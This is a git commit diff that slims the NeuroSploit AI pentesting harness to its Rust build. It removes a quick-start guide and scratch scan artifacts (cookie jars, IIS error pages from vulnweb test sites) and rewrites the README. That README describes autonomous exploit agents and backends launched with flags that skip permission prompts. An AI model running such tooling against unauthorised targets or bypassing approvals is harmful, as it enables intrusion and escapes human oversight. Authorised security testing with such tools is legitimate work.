v3.4.1: slim Rust-only branch

Keep only the Rust harness (neurosploit-rs/) + the agent library (agents_md/) it
loads at runtime, plus docs. Remove the Python engine, web GUIs, legacy stack,
docker, build scripts and scratch test files from THIS branch only (other
branches keep everything). Rust-focused README with Kali/Docker + tool-install
guidance and testphp/DVWA usage examples.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This commit is contained in:
CyberSecurityUP
2026-06-24 19:36:16 -03:00
parent 96f00c1c68
commit 0a2cf58d9e
437 changed files with 117 additions and 154450 deletions
-289
View File
@@ -1,289 +0,0 @@
# NeuroSploit v3 - Quick Start Guide
Get NeuroSploit running in under 5 minutes.
---
## Prerequisites
| Requirement | Minimum | Recommended |
|-------------|---------|-------------|
| **Python** | 3.10+ | 3.12 |
| **Node.js** | 18+ | 20 LTS |
| **Docker** | 24+ | Latest (for Kali sandbox) |
| **RAM** | 4 GB | 8 GB+ |
| **Disk** | 2 GB | 5 GB (with Kali image) |
| **LLM API Key** | 1 provider | Claude recommended |
---
## Step 1: Clone & Configure
```bash
git clone https://github.com/your-org/NeuroSploitv2.git
cd NeuroSploitv2
# Create your environment file
cp .env.example .env
```
Edit `.env` and add at least one API key:
```bash
# Pick one (or more):
ANTHROPIC_API_KEY=sk-ant-... # Claude (recommended)
OPENAI_API_KEY=sk-... # GPT-4
GEMINI_API_KEY=AI... # Gemini Pro
OPENROUTER_API_KEY=sk-or-... # OpenRouter (any model)
```
> **No API key?** Use a local LLM (Ollama or LM Studio) -- see [Local LLM Setup](#local-llm-setup) below.
---
## Step 2: Install Dependencies
### Backend
```bash
pip install -r backend/requirements.txt
```
### Frontend
```bash
cd frontend
npm install
cd ..
```
---
## Step 3: Build Kali Sandbox Image (Optional but Recommended)
The Kali sandbox enables isolated tool execution (Nuclei, Nmap, SQLMap, etc.) in Docker containers.
```bash
# Requires Docker Desktop running
./scripts/build-kali.sh --test
```
This builds a Kali Linux image with 28 pre-installed security tools. Takes ~5 min on first build.
> **No Docker?** NeuroSploit works without it -- the agent uses HTTP-only testing. Docker adds tool-based scanning (Nuclei, Nmap, etc.).
---
## Step 4: Start NeuroSploit
### Option A: Development Mode (hot reload)
Terminal 1 -- Backend:
```bash
uvicorn backend.main:app --host 0.0.0.0 --port 8000 --reload
```
Terminal 2 -- Frontend:
```bash
cd frontend
npm run dev
```
Open: **http://localhost:5173**
### Option B: Production Mode
```bash
# Build frontend
cd frontend && npm run build && cd ..
# Start backend (serves frontend too)
uvicorn backend.main:app --host 0.0.0.0 --port 8000
```
Open: **http://localhost:8000**
### Option C: Quick Start Script
```bash
./start.sh
```
---
## Step 5: Verify Setup
### Check API Health
```bash
curl http://localhost:8000/api/health
```
Expected response:
```json
{
"status": "healthy",
"app": "NeuroSploit",
"version": "3.0.0",
"llm": {
"status": "configured",
"provider": "claude",
"message": "AI agent ready"
}
}
```
### Check Swagger Docs
Open **http://localhost:8000/api/docs** for interactive API documentation.
---
## Your First Scan
### Option 1: Auto Pentest (Recommended)
1. Open the web interface
2. Click **Auto Pentest** in the sidebar
3. Enter a target URL (e.g., `http://testphp.vulnweb.com`)
4. Click **Start Auto Pentest**
5. Watch the 3-stream parallel scan in real-time
### Option 2: Via API
```bash
curl -X POST http://localhost:8000/api/v1/agent/run \
-H "Content-Type: application/json" \
-d '{
"target": "http://testphp.vulnweb.com",
"mode": "auto_pentest"
}'
```
### Option 3: Vuln Lab (Single Type)
1. Click **Vuln Lab** in the sidebar
2. Pick a vulnerability type (e.g., `xss_reflected`)
3. Enter target URL
4. Click **Run Test**
---
## Pages Overview
| Page | What it does |
|------|-------------|
| **Dashboard** (`/`) | Stats, severity charts, recent activity |
| **Auto Pentest** (`/auto`) | One-click full autonomous pentest |
| **Vuln Lab** (`/vuln-lab`) | Test specific vuln types (100 available) |
| **Terminal Agent** (`/terminal`) | AI chat + command execution |
| **Sandboxes** (`/sandboxes`) | Monitor Kali containers in real-time |
| **Scheduler** (`/scheduler`) | Schedule recurring scans |
| **Reports** (`/reports`) | View/download generated reports |
| **Settings** (`/settings`) | Configure LLM providers, features |
---
## Local LLM Setup
### Ollama (Easiest)
```bash
# Install Ollama
curl -fsSL https://ollama.ai/install.sh | sh
# Pull a model
ollama pull llama3.1
# Add to .env
echo "OLLAMA_BASE_URL=http://localhost:11434" >> .env
```
### LM Studio
1. Download from [lmstudio.ai](https://lmstudio.ai)
2. Load any model (e.g., Mistral, Llama)
3. Start the server on port 1234
4. Add to `.env`:
```
LMSTUDIO_BASE_URL=http://localhost:1234
```
---
## Kali Sandbox Commands
```bash
# Build image
./scripts/build-kali.sh
# Rebuild from scratch
./scripts/build-kali.sh --fresh
# Build + verify tools work
./scripts/build-kali.sh --test
# Check running containers (via API)
curl http://localhost:8000/api/v1/sandbox/
# Monitor via web UI
# Open http://localhost:8000/sandboxes
```
### Pre-installed tools (28)
nuclei, naabu, httpx, subfinder, katana, dnsx, uncover, ffuf, gobuster, dalfox, waybackurls, nmap, nikto, sqlmap, masscan, whatweb, curl, wget, git, python3, pip3, go, jq, dig, whois, openssl, netcat, bash
### On-demand tools (28 more)
Installed inside the container automatically when first needed:
wpscan, dirb, hydra, john, hashcat, testssl, sslscan, enum4linux, dnsrecon, amass, medusa, crackmapexec, gau, gitleaks, anew, httprobe, dirsearch, wfuzz, arjun, wafw00f, sslyze, commix, trufflehog, retire, fierce, nbtscan, responder
---
## Troubleshooting
### "AI agent not configured"
Check your `.env` has at least one valid API key:
```bash
curl http://localhost:8000/api/health | python3 -m json.tool
```
### "Kali sandbox image not found"
Build the Docker image:
```bash
./scripts/build-kali.sh
```
### "Docker daemon not running"
Start Docker Desktop, then retry.
### "Port 8000 already in use"
```bash
lsof -i :8000
kill <PID>
```
### Frontend not loading
Dev mode: ensure frontend is running (`npm run dev` in `/frontend`).
Production: ensure `frontend/dist/` exists (`cd frontend && npm run build`).
---
## What's Next
- Read the full [README.md](README.md) for architecture details
- Explore the **100 vulnerability types** in Vuln Lab
- Set up **scheduled scans** for continuous monitoring
- Try the **Terminal Agent** for interactive AI-guided testing
- Check the **Sandbox Dashboard** to monitor container health
---
**NeuroSploit v3** - *AI-Powered Autonomous Penetration Testing Platform*
+117 -228
View File
@@ -1,253 +1,142 @@
# NeuroSploit v3.4.0
# NeuroSploit v3.4.1 🦀
![NeuroSploit](https://img.shields.io/badge/NeuroSploit-Autonomous%20AI%20Pentest-blueviolet)
![Version](https://img.shields.io/badge/Version-3.4.0-blue)
![Version](https://img.shields.io/badge/Version-3.4.1-blue)
![Harness](https://img.shields.io/badge/Harness-Rust%20%7C%20tokio-e6b673)
![License](https://img.shields.io/badge/License-MIT-green)
![Harness](https://img.shields.io/badge/Harness-Rust%20%7C%20tokio%20%7C%20axum-e6b673)
![Agents](https://img.shields.io/badge/MD%20Agents-249-red)
![Models](https://img.shields.io/badge/Models-12%20providers%20%2F%2040%2B-success)
![Backends](https://img.shields.io/badge/Subscription-Claude%20%7C%20Codex%20%7C%20Grok%20%7C%20Gemini-informational)
![MCP](https://img.shields.io/badge/MCP-Playwright-orange)
![Models](https://img.shields.io/badge/Models-12%20providers-success)
**Autonomous, markdown-driven AI penetration testing — now with a Rust multi-model harness.**
**Autonomous, multi-model penetration-testing harness — Rust, CLI-only.**
NeuroSploit turns a URL (or a code repository) into an autonomous security
engagement. A high-performance **Rust harness** (`tokio` + `axum`) drives a
**pool of LLM models** with concurrency, **provider failover**, and **N-model
validator voting** — multiple models must independently agree a finding is real
before it is reported. After recon, the harness **intelligently selects** which
of the **249 markdown agents** match the target instead of running them blindly,
learns across runs via a **reinforcement-learning** reward loop, and serves its
own polished web dashboard.
This branch is the **slim, Rust-only** distribution: the `neurosploit-rs/` workspace
plus the `agents_md/` agent library. It turns a URL (black-box) or a code
repository (white-box) into an autonomous engagement that drives a pool of LLMs
— via **API key** or local **subscription** (Claude Code / Codex / Gemini / Grok)
recons the target, **intelligently selects only the agents matching the
discovered surface**, runs them in parallel, then validates every finding by
**cross-model voting** before reporting.
> The Python engine (v3.3.0) and the original monolith live in
> [`legacy/`](legacy/README.md); the v3.3.0 stdlib dashboard remains in `webgui/`.
## 🦀 The Rust harness (`neurosploit-rs/`)
```bash
cd neurosploit-rs && cargo build --release
# Web dashboard (black-box + white-box modes)
./target/release/neurosploit serve # → http://127.0.0.1:8788
# Black-box: recon → intelligent agent selection → parallel exploit → vote → report
./target/release/neurosploit run https://target.example \
--model anthropic:claude-opus-4-8 --model openai:gpt-5.1 --vote-n 3
# White-box: analyse a repository's source for vulnerabilities
./target/release/neurosploit whitebox /path/to/repo --subscription --model anthropic:claude-opus-4-8
# Subscription (no API key) + real browser proof via Playwright MCP
./target/release/neurosploit run https://t.example --subscription --mcp --model anthropic:claude-opus-4-8
# Pipeline self-test, no keys/login required
./target/release/neurosploit run https://t.example --offline
```
**What it does**
- **Two modes** — *black-box* (URL recon → exploit) and *white-box* (walk a repo,
run code-review/SAST agents on the source).
- **Intelligent selection** — the model picks the agents whose preconditions match
the recon, then runs that subset (not top-N).
- **Multi-model pool** — bounded concurrency, **provider failover**, and the same
panel forms the **N-model validator jury** that cuts false positives.
- **Two auth paths** — **model APIs** (provider key) *or* **subscription**: drive
your local **Claude Code / Codex / Grok / Gemini** logins directly, no API key.
- **12 providers / 40+ models** (Claude, GPT, Grok, **Gemini**, NVIDIA NIM,
DeepSeek, Mistral, Qwen, Groq, Together, OpenRouter, Ollama).
- **RL rewards** persisted to `data/rl_state_rs.json` — validated findings reward
an agent, biasing the next run.
- **Artifacts for reuse** — every run writes `runs/<target>-<ts>/`:
`recon.json/md`, `exploitation.md`, `findings.json/md`, `report.html`.
- **Playwright MCP** on the subscription path for real browser-based proof.
### Agent library — 249 agents
| Category | Dir | Count | Purpose |
|----------|-----|-------|---------|
| Vulnerability specialists | `agents_md/vulns/` | 196 | Exploit a specific vuln class |
| Recon | `agents_md/recon/` | 12 | Information gathering / attack surface |
| Code (white-box SAST) | `agents_md/code/` | 24 | Source-code vulnerability review |
| Meta | `agents_md/meta/` | 17 | Orchestrator, validator, scorers, reporter, RL |
> The full project (Python engine, web GUIs, history) lives on the `main` branch.
---
## Why this architecture
## Build
| Old (≤ v3.2.4) | New (v3.3.0) |
|----------------|-------------|
| 2,500-line Python orchestrator + hand-coded agent classes | Markdown agents + thin engine |
| One embedded LLM loop | Pluggable agentic CLI backends (Claude/Codex/Grok) |
| Provider SDK juggling | Backend owns the agent loop; engine just composes & collects |
| Static agent list | RL-weighted, recon-aware agent selection |
| Reflection-based "evidence" | Playwright MCP proof-of-execution + adversarial validation |
```bash
cd neurosploit-rs
cargo build --release # → target/release/neurosploit
```
Requires a Rust toolchain (`rustup`). **Recommended: run on Kali Linux** (or the
Kali Docker image) so the offensive tools the agents use are already present:
```bash
docker run -it --rm kalilinux/kali-rolling
apt update && apt install -y curl nmap ffuf nodejs npm
# rustscan (faster port scan): cargo install rustscan (or grab a release from GitHub)
```
The agents degrade gracefully: if `rustscan` isn't installed they use `nmap`; if
neither, they probe with `curl`. If a Playwright MCP browser is available they use
it for JS-heavy pages, otherwise they fall back to `curl`.
---
## Usage
Run with **no arguments** for an interactive wizard:
```bash
./target/release/neurosploit
```
Or drive it directly:
```bash
# Black-box — subscription (no API key), Opus, browser via Playwright if present, verbose
./target/release/neurosploit run http://testphp.vulnweb.com/ \
--subscription --model anthropic:claude-opus-4-8 --mcp -v
# Black-box — API keys, multi-model voting panel (1st finds, others adjudicate)
./target/release/neurosploit run http://testphp.vulnweb.com/ \
--model anthropic:claude-opus-4-8 --model openai:gpt-5.1 --vote-n 3
# White-box — clone a vulnerable app and review its source
git clone https://github.com/digininja/DVWA /tmp/DVWA
./target/release/neurosploit whitebox /tmp/DVWA \
--subscription --model anthropic:claude-opus-4-8 -v
# Offline pipeline self-test (no keys/login needed)
./target/release/neurosploit run http://testphp.vulnweb.com/ --offline
# Utilities
./target/release/neurosploit agents # library counts
./target/release/neurosploit models # providers & models
./target/release/neurosploit --help # full help with examples
```
### Options (`run` / `whitebox`)
| Flag | Meaning |
|------|---------|
| `--model provider:model` | Repeatable. First = primary; the rest fail over **and** form the voting jury. |
| `--subscription` | Use the local CLI login (Claude/Codex/Gemini/Grok) instead of an API key. |
| `--mcp` | Enable Playwright MCP (auto-provisioned via `npx`; backends without MCP use built-in tools). |
| `--vote-n N` | How many models must agree a finding is real (default 3 / 2 for whitebox). |
| `--max-agents N` | Cap agents run (`0` = all matching the recon). |
| `--offline` | Exercise the full pipeline without calling any model. |
| `-v, --verbose` | Log each agent as it launches, recon, and votes. |
### Auth
- **API key** — export the provider's key (`ANTHROPIC_API_KEY`, `OPENAI_API_KEY`,
`GEMINI_API_KEY`, `XAI_API_KEY`, `NVIDIA_NIM_API_KEY`, …). See `.env.example`.
- **Subscription** — `--subscription` drives your local `claude` / `codex` /
`gemini` / `grok` login. No API key needed.
---
## How it works
```
┌──────────────────────────────────────────────────────────────┐
URL ──▶ │ neurosploit (terminal) │
│ │ │
│ ▼ │
│ orchestrator ── loads agents_md/ (213) ── applies RL weights │
│ │ │
│ ▼ composes ONE master prompt │
│ backend (Claude Code | Codex | Grok) ◀── Playwright MCP │
│ │ autonomously runs the pipeline below │
│ ▼ │
│ recon → select agents → exploit → VALIDATE → filter FPs │
│ → severity → impact → report → RL feedback │
└──────────────────────────────────────────────────────────────┘
│ │
▼ ▼
results/findings.json data/rl_state.json (learns)
target ─▶ recon (curl/nmap/…) ─▶ INTELLIGENT agent selection (recon-aware)
─▶ parallel exploitation ─▶ cross-model validation vote
─▶ severity/score ─▶ report (HTML + Typst PDF) ─▶ RL reward update
```
The engine never fabricates findings: every candidate is independently
re-exploited (`meta/exploit_validator`), run through an adversarial skeptic
(`meta/false_positive_filter`), and only then scored and reported.
Every run writes a self-contained folder `runs/ns-<ts>-<target>/`:
| File | Contents |
|------|----------|
| `status.json` | `running``complete` with a summary |
| `recon.json` / `recon.md` | mapped attack surface |
| `exploitation.md` | raw per-agent transcript |
| `findings.json` / `findings.md` | validated findings (reuse by other tools/AIs) |
| `report.html`, `report.typ`, `report.pdf` | final report (PDF via the Typst engine) |
A reinforcement-learning reward store (`data/rl_state_rs.json`) biases agent
selection on future runs.
## Agent library — `agents_md/` (249)
| Category | Count | Purpose |
|----------|-------|---------|
| `vulns/` | 196 | Exploit a specific vulnerability class |
| `recon/` | 12 | Information gathering / attack surface |
| `code/` | 24 | White-box source-code (SAST) review |
| `meta/` | 17 | Orchestrator, validator, scorers, reporter, RL |
Each agent is a self-contained markdown playbook (`## User Prompt` methodology +
`## System Prompt` strict anti-false-positive rules). Drop a new `.md` into the
matching folder and the harness picks it up.
---
## The agent library (`agents_md/`)
## Safety
**213 agents** — see [`agents_md/REGISTRY.md`](agents_md/REGISTRY.md).
- **196 vulnerability specialists** (`agents_md/vulns/`) — each a self-contained
playbook with a real methodology, payloads, CWE mapping, and a strict
anti-false-positive `## System Prompt`. Coverage includes the classic OWASP
web set **plus modern classes**:
- **LLM/AI security** (OWASP LLM Top 10): prompt injection (direct/indirect),
jailbreak, system-prompt leak, insecure output handling, RAG poisoning,
tool-invocation/function-calling abuse, excessive agency, PII leakage…
- **Cloud/K8s/containers**: IMDS SSRF (AWS/GCP/Azure), kubelet/dashboard
exposure, container & docker-socket escape, bucket takeover, IAM privesc…
- **Modern API/auth**: JWT alg/kid/jwk confusion, OAuth PKCE downgrade, SAML
XSW, OIDC, CSWSH, refresh-token & MFA bypass, account-takeover chains…
- **Advanced injection**: SSTI (Jinja2/FreeMarker/Velocity/Thymeleaf), SSPP,
XXE OOB, YAML/pickle deserialization, JNDI, XSLT…
- **Protocol/cache/smuggling**: HTTP/2 & CL.TE/TE.CL desync, h2c, web cache
deception/poisoning, response splitting, path-confusion…
- **Logic/crypto/supply-chain**: dependency confusion, padding oracle, weak
JWT secret, price/coupon/workflow abuse, exposed `.git`/`.env`/CI secrets…
- **17 meta-agents** (`agents_md/meta/`): `orchestrator`, `recon`,
`exploit_validator`, `false_positive_filter`, `severity_assessor`,
`impact_evaluator`, `reporter`, `rl_feedback`, plus migrated expert roles.
Add your own by dropping a `.md` into `agents_md/vulns/` (or extend the
data-driven builder, `scripts/build_agents.py`). It is picked up automatically.
---
## Quickstart
```bash
# 1. Have at least one agentic CLI installed: Claude Code, Codex, or Grok CLI
# (Playwright MCP needs Node/npx)
./neurosploit backends # show what's detected
./neurosploit agents # {'vulns': 196, 'meta': 17, 'total': 213}
# 2. Interactive: enter a URL, pick a backend + model, go
./neurosploit
# 3. Or one-shot:
./neurosploit run https://target.example \
--backend claude --model claude-opus-4-8 \
--collaborator oob.your-collab.net
# 4. Preview the composed master prompt without executing the backend:
./neurosploit run https://target.example --dry-run
```
Outputs land in `results/<target>/findings.json` and `reports/`, and the RL
state updates in `data/rl_state.json`.
### Web dashboard
A zero-dependency (Python stdlib only) dashboard — no npm, no build step:
```bash
python3 webgui/server.py # → http://127.0.0.1:8787
```
Tabs:
- **Run** — multi-target input, backend + provider + model pickers (40 models
across CLI and API providers), verbosity, RL/MCP toggles, a live execution
console (shows the exact backend command and per-task activity), and findings
with screenshots.
- **Agents** — browse all 213 agents and **add new `.md` agents** from the UI;
the main orchestrator picks them up on the next run.
- **Insights** — interactive chart of RL agent weights + findings by severity.
- **Reports** — download/preview the **PDF + HTML** reports (Typst engine).
- **Settings · API** — execution mode (CLI vs API), per-provider API keys,
orchestrator selection, default verbosity.
It calls `neurosploit_agent` directly. The previous React app and FastAPI backend
were retired to `legacy/` (`frontend_react/`, `backend_fastapi/`).
### Backends
| Backend | Binary | Autonomy flag | Subscription |
|---------|--------|---------------|--------------|
| Claude Code | `claude` | `--dangerously-skip-permissions` | ✅ via Claude login |
| Codex CLI | `codex` | `--dangerously-bypass-approvals-and-sandbox` | — |
| Grok CLI | `grok` | `--yolo` | — |
The engine auto-detects installed backends and only offers those. In the
interactive flow, answering **yes** to "Use Claude subscription" runs Claude Code
against your logged-in subscription instead of an API key.
### Models
Latest models per provider live in `neurosploit_agent/models.py`, including the
**NVIDIA NIM** provider (PR #28, OpenAI-compatible at
`https://integrate.api.nvidia.com/v1`, `nvapi-` keys), Anthropic Claude 4.x,
OpenAI, xAI Grok, Gemini, OpenRouter, and local Ollama.
---
## Reinforcement learning
Every run produces per-agent reward signals (`meta/rl_feedback` +
`neurosploit_agent/rl.py`): validated findings reward an agent (weighted by
severity), rejected false positives penalize it, correct skips stay neutral.
Weights are bounded `[0.05, 1.0]` and carry per-tech-stack affinity, so the
engine learns, e.g., to prioritize `ssti_jinja2` on Flask targets. State is
explainable and persisted to `data/rl_state.json`.
---
## Safety & authorization
NeuroSploit is for **authorized** security testing only. Every agent's system
prompt enforces scope and proof-of-exploitation; DoS-class agents refuse to
flood and require explicit rules-of-engagement. You are responsible for having
written permission for any target you point it at.
---
## Repository layout
```
neurosploit # launcher (./neurosploit)
neurosploit_agent/ # the v3.3.0 engine
cli.py orchestrator.py agent_loader.py backends.py rl.py mcp.py models.py config.py
agents_md/
vulns/ (196) # vulnerability specialist agents
meta/ (17) # orchestrator, recon, validator, scorers, reporter, RL, roles
REGISTRY.md # generated index
scripts/build_agents.py # data-driven agent builder
legacy/ # retired pre-v3.3.0 Python orchestration
```
See [`RELEASE.md`](RELEASE.md) for the full v3.3.0 changelog.
---
For **authorized** testing only. Agents are instructed to stay in scope, never run
destructive/DoS actions, and require proof-of-exploitation. You are responsible for
having permission for any target.
## License
-7
View File
@@ -1,7 +0,0 @@
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 23 Jun 2026 21:13:25 GMT
Content-Length: 1245
-29
View File
@@ -1,29 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
-5
View File
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId 1mkryz45pc3j44ua53yfe545
-5
View File
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId okc513jjz1kxsxbmkmidnmfs
-5
View File
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId r2w133jnjihmgf552tyes4uh
-122
View File
@@ -1,122 +0,0 @@
<html>
<head>
<title>Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
[No relevant source lines]</pre></code>
</td>
</tr>
</table>
<br>
<b> Source File: </b> c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs<b> &nbsp;&nbsp; Line: </b> 0
<br><br>
<b>Stack Trace:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
[ViewStateException: Invalid viewstate.
Client IP: 177.62.32.16
Port: 56298
User-Agent: Mozilla/5.0
ViewState: /wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu
Referer:
Path: /Comments.aspx]
[HttpException (0x80004005): Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
http://go.microsoft.com/fwlink/?LinkID=314055]
System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) +190
System.Web.UI.ObjectStateFormatter.Deserialize(String inputString) +11093249
System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState) +59
System.Web.UI.HiddenFieldPageStatePersister.Load() +11093352
System.Web.UI.Page.LoadPageStateFromPersistenceMedium() +11178689
System.Web.UI.Page.LoadAllState() +46
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11174087
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11173626
System.Web.UI.Page.ProcessRequest() +91
System.Web.UI.Page.ProcessRequest(HttpContext context) +240
ASP.comments_aspx.ProcessRequest(HttpContext context) in c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +599
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +171
</pre></code>
</td>
</tr>
</table>
<br>
<hr width=100% size=1 color=silver>
<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.8974; ASP.NET Version:2.0.50727.8974
</font>
</body>
</html>
<!--
[ViewStateException]: Invalid viewstate.
Client IP: 177.62.32.16
Port: 56298
User-Agent: Mozilla/5.0
ViewState: /wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu
Referer:
Path: /Comments.aspx
[HttpException]: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
http://go.microsoft.com/fwlink/?LinkID=314055
at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError)
at System.Web.UI.ObjectStateFormatter.Deserialize(String inputString)
at System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState)
at System.Web.UI.HiddenFieldPageStatePersister.Load()
at System.Web.UI.Page.LoadPageStateFromPersistenceMedium()
at System.Web.UI.Page.LoadAllState()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
